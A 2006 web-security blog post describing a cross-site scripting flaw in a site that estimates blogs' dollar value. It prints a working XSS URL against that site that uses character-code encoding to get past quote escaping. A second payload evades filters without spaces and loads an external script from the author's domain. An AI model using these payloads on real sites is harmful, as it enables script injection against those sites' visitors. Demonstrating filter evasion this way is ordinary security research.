I ran into a link from Shoemoney a while back and I always thought it was amusing. If you rank high enough in technorati.com you’ll find that www.business-opportunities.biz claims you are worth a lot of money. As a matter of point, this blog (http://ha.ckers.org/) is worth $82,000. Not bad! Any takers?

But then I checked http://x.ca/<script>alert(String.fromCharCode(88,83,83))</script> and apparently that’s not worth anything other than a page rank 7 XSS injection. That’s not super interesting, except for why I needed use this particular injection. The author put some amount of filtering in his scripts looking to block single and double quotes by adding in a backslash for each. There are many ways around this (the one above is probably the simplest way since it doesn’t appear to decode %20 to space).

A while back I got an email from star_dust who came up with another method to inject JavaScript without any spaces. Granted, it still uses quotes so it wouldn’t have worked for this particular injection but it made me think. Until now I hadn’t thought it was worth posting, but now I think it is:

<script/XSS=''SRC='http://ha.ckers.org/xss.js'></script>

That will works fine because of the slash, which is a non-alpha-non-numeric. Firefox pretty much allows anything there, but IE only allows the slash. There may have been a way to modify this to remove quotes, but I wasn’t that desperate to show the demonstration. Maybe I can up it so it says my blog is worth a million? Maybe there is some sucker who thinks $80k is a bargain. Who knows!

P.S. please dont mess with this poor guy’s blog. This was for demonstration purposes only.

This entry was posted on Thursday, August 10th, 2006 at 8:54 am and is filed under XSS, Webappsec, SEO/SEM. Responses are currently closed, but you can trackback from your own site.